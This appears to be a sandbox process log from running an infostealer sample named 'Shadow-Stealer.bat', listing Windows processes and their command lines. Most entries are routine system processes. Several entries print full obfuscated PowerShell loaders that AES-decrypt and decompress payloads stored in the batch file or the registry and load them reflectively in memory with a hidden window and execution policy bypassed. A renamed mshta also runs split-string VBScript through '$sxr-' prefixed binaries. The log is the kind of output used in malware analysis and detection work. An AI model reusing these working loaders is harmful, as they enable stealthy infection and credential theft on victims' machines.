C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe

"Shadow-Stealer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function pXqKy($AMMuC){ $QAuMi=[System.Security.Cryptography.Aes]::Create(); $QAuMi.Mode=[System.Security.Cryptography.CipherMode]::CBC; $QAuMi.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $QAuMi.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('loy14lThS3SgWk7zmlM+U1LaSbD9l9+GRTu5mLzp2mM='); $QAuMi.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lS2YpgJeBrTrEw/fJyL2OQ=='); $LSyot=$QAuMi.CreateDecryptor(); $return_var=$LSyot.TransformFinalBlock($AMMuC, 0, $AMMuC.Length); $LSyot.Dispose(); $QAuMi.Dispose(); $return_var;}function YaPup($AMMuC){ $BpqPy=New-Object System.IO.MemoryStream(,$AMMuC); $MUxyL=New-Object System.IO.MemoryStream; $QRzEr=New-Object System.IO.Compression.GZipStream($BpqPy, [IO.Compression.CompressionMode]::Decompress); $QRzEr.CopyTo($MUxyL); $QRzEr.Dispose(); $BpqPy.Dispose(); $MUxyL.Dispose(); $MUxyL.ToArray();}function dAvUr($AMMuC,$oAPri){ $TIrdu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$AMMuC); $cmozY=$TIrdu.EntryPoint; $cmozY.Invoke($null, $oAPri);}$agzCo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat').Split([Environment]::NewLine);foreach ($xWgWP in $agzCo) { if ($xWgWP.StartsWith('SEROXEN')) { $gZeLJ=$xWgWP.Substring(7); break; }}$paQQY=[string[]]$gZeLJ.Split('\');$ahdVx=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[0])));$qbiwj=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[1])));dAvUr $qbiwj (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dAvUr $ahdVx (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{3455b23a-1e77-4396-b01f-d91fa209e7b4}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{13190d35-2ee9-4a8b-9f54-2eb814499454}

C:\Windows\$sxr-mshta.exe

C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"

C:\Windows\$sxr-cmd.exe

"C:\Windows\$sxr-cmd.exe" /c %$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\$sxr-powershell.exe

C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8G4arHTtORWkqMdtdm7CA=');$tgmGC = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tgmGC, 0, $tgmGC.Length);$tgmGC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tgmGC);$zvkCv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JVVxi793TWK0eiazbMjyxQ==');$zvkCv = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zvkCv, 0, $zvkCv.Length);$zvkCv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zvkCv);$MrvyW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('y9CiMcnIF08D1mbStDfFzg==');$MrvyW = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MrvyW, 0, $MrvyW.Length);$MrvyW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MrvyW);$UFhRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Gkz3kktZWs5v4iY/fwpuA==');$UFhRe = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UFhRe, 0, $UFhRe.Length);$UFhRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UFhRe);$BdNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWujaRBJ7Bka6/SLPc2zjg==');$BdNHQ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdNHQ, 0, $BdNHQ.Length);$BdNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdNHQ);$NXCWg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JS1eCTl+J3Vy2lPum4BV+A==');$NXCWg = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NXCWg, 0, $NXCWg.Length);$NXCWg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NXCWg);$UMIrZ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xun+s5YVAeQzgGPJKptAJw==');$UMIrZ0 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ0, 0, $UMIrZ0.Length);$UMIrZ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ0);$UMIrZ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tKxTd8rUmwwPDWYqtJ+flg==');$UMIrZ1 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ1, 0, $UMIrZ1.Length);$UMIrZ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ1);$UMIrZ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QwPWmxWc7oP0xMzohMzOyA==');$UMIrZ2 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ2, 0, $UMIrZ2.Length);$UMIrZ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ2);$UMIrZ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00EoyZz50MzeF+YVDb5OyQ==');$UMIrZ3 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ3, 0, $UMIrZ3.Length);$UMIrZ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ3);$qsFQP.Dispose();$xCaUG1.Dispose();if (@(get-process -ea silentlycontinue $UMIrZ3).count -gt 1) {exit};$dINWW = [Microsoft.Win32.Registry]::$BdNHQ.$UFhRe($UMIrZ).$MrvyW($PYyQA);$QJXfU=[string[]]$dINWW.Split('\');$flTmo=nnKof(VOHZF([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[1])));vzvJZ $flTmo (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$iBTnS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[0]);$xCaUG = New-Object System.Security.Cryptography.AesManaged;$xCaUG.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$CTnvz = $xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')();$iBTnS = $CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBTnS, 0, $iBTnS.Length);$CTnvz.Dispose();$xCaUG.Dispose();$ABMbT = New-Object System.IO.MemoryStream(, $iBTnS);$FswzF = New-Object System.IO.MemoryStream;$ZWQus = New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::$UMIrZ1);$ZWQus.$NXCWg($FswzF);$ZWQus.Dispose();$ABMbT.Dispose();$FswzF.Dispose();$iBTnS = $FswzF.ToArray();$JJwWP = $tgmGC | IEX;$kXIpu = $JJwWP::$UMIrZ2($iBTnS);$OPPDg = $kXIpu.EntryPoint;$OPPDg.$UMIrZ0($null, (, [string[]] ($roofG)))

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{54e745f9-6d6a-425a-985d-828edb7c0146}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{f1103143-cf47-4231-9dff-93c0d4e2f17a}

C:\Windows\$sxr-powershell.exe

"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3264).WaitForExit();[System.Threading.Thread]::Sleep(5000); function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8G4arHTtORWkqMdtdm7CA=');$tgmGC = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tgmGC, 0, $tgmGC.Length);$tgmGC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tgmGC);$zvkCv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JVVxi793TWK0eiazbMjyxQ==');$zvkCv = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zvkCv, 0, $zvkCv.Length);$zvkCv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zvkCv);$MrvyW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('y9CiMcnIF08D1mbStDfFzg==');$MrvyW = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MrvyW, 0, $MrvyW.Length);$MrvyW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MrvyW);$UFhRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Gkz3kktZWs5v4iY/fwpuA==');$UFhRe = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UFhRe, 0, $UFhRe.Length);$UFhRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UFhRe);$BdNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWujaRBJ7Bka6/SLPc2zjg==');$BdNHQ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdNHQ, 0, $BdNHQ.Length);$BdNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdNHQ);$NXCWg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JS1eCTl+J3Vy2lPum4BV+A==');$NXCWg = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NXCWg, 0, $NXCWg.Length);$NXCWg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NXCWg);$UMIrZ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xun+s5YVAeQzgGPJKptAJw==');$UMIrZ0 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ0, 0, $UMIrZ0.Length);$UMIrZ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ0);$UMIrZ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tKxTd8rUmwwPDWYqtJ+flg==');$UMIrZ1 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ1, 0, $UMIrZ1.Length);$UMIrZ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ1);$UMIrZ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QwPWmxWc7oP0xMzohMzOyA==');$UMIrZ2 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ2, 0, $UMIrZ2.Length);$UMIrZ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ2);$UMIrZ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00EoyZz50MzeF+YVDb5OyQ==');$UMIrZ3 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ3, 0, $UMIrZ3.Length);$UMIrZ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ3);$qsFQP.Dispose();$xCaUG1.Dispose();if (@(get-process -ea silentlycontinue $UMIrZ3).count -gt 1) {exit};$dINWW = [Microsoft.Win32.Registry]::$BdNHQ.$UFhRe($UMIrZ).$MrvyW($PYyQA);$QJXfU=[string[]]$dINWW.Split('\');$flTmo=nnKof(VOHZF([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[1])));vzvJZ $flTmo (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$iBTnS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[0]);$xCaUG = New-Object System.Security.Cryptography.AesManaged;$xCaUG.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$CTnvz = $xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')();$iBTnS = $CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBTnS, 0, $iBTnS.Length);$CTnvz.Dispose();$xCaUG.Dispose();$ABMbT = New-Object System.IO.MemoryStream(, $iBTnS);$FswzF = New-Object System.IO.MemoryStream;$ZWQus = New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::$UMIrZ1);$ZWQus.$NXCWg($FswzF);$ZWQus.Dispose();$ABMbT.Dispose();$FswzF.Dispose();$iBTnS = $FswzF.ToArray();$JJwWP = $tgmGC | IEX;$kXIpu = $JJwWP::$UMIrZ2($iBTnS);$OPPDg = $kXIpu.EntryPoint;$OPPDg.$UMIrZ0($null, (, [string[]] ($roofG)))

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{f4b702ba-50dc-40e9-96d8-424c3f8ee150}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{dea3282c-a49b-461e-9067-79a8adf6ecd7}

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{b65a5e11-da2a-4d2f-856d-f3dd32ba9ec3}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{a0f8c7f4-a97c-46d7-abd1-d678cb0569d5}

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{6826c128-6d66-4805-a13c-d36e731fa8f9}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{2f31e55d-e170-4e53-a6ad-b69adbda5ccd}

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{4f5aa893-b7cb-4f72-a561-1c5f695328e0}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{e0f8f228-ac5f-4064-abda-4046386f3608}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{2b748b6f-ecc5-4e4a-90c7-98aa7f08588b}

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{db0aa1dd-3628-47d4-b912-759bdfab246d}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{44898605-52f5-4939-956e-cba3f54bfb22}

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{841db114-410f-478e-a5e5-b69122191b90}

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k WerSvcGroup

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 6000 -ip 6000

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6000 -s 472

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{4fbe0289-c856-4047-805c-11689a33721b}

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 5520 -ip 5520

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5520 -s 476

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{6435be7b-5708-44a6-ba54-0b98bccdde1d}

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 416 -p 5836 -ip 5836

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{4fd59ff4-8432-4b06-b013-7419c814bb98}

C:\Windows\system32\WerFault.exe

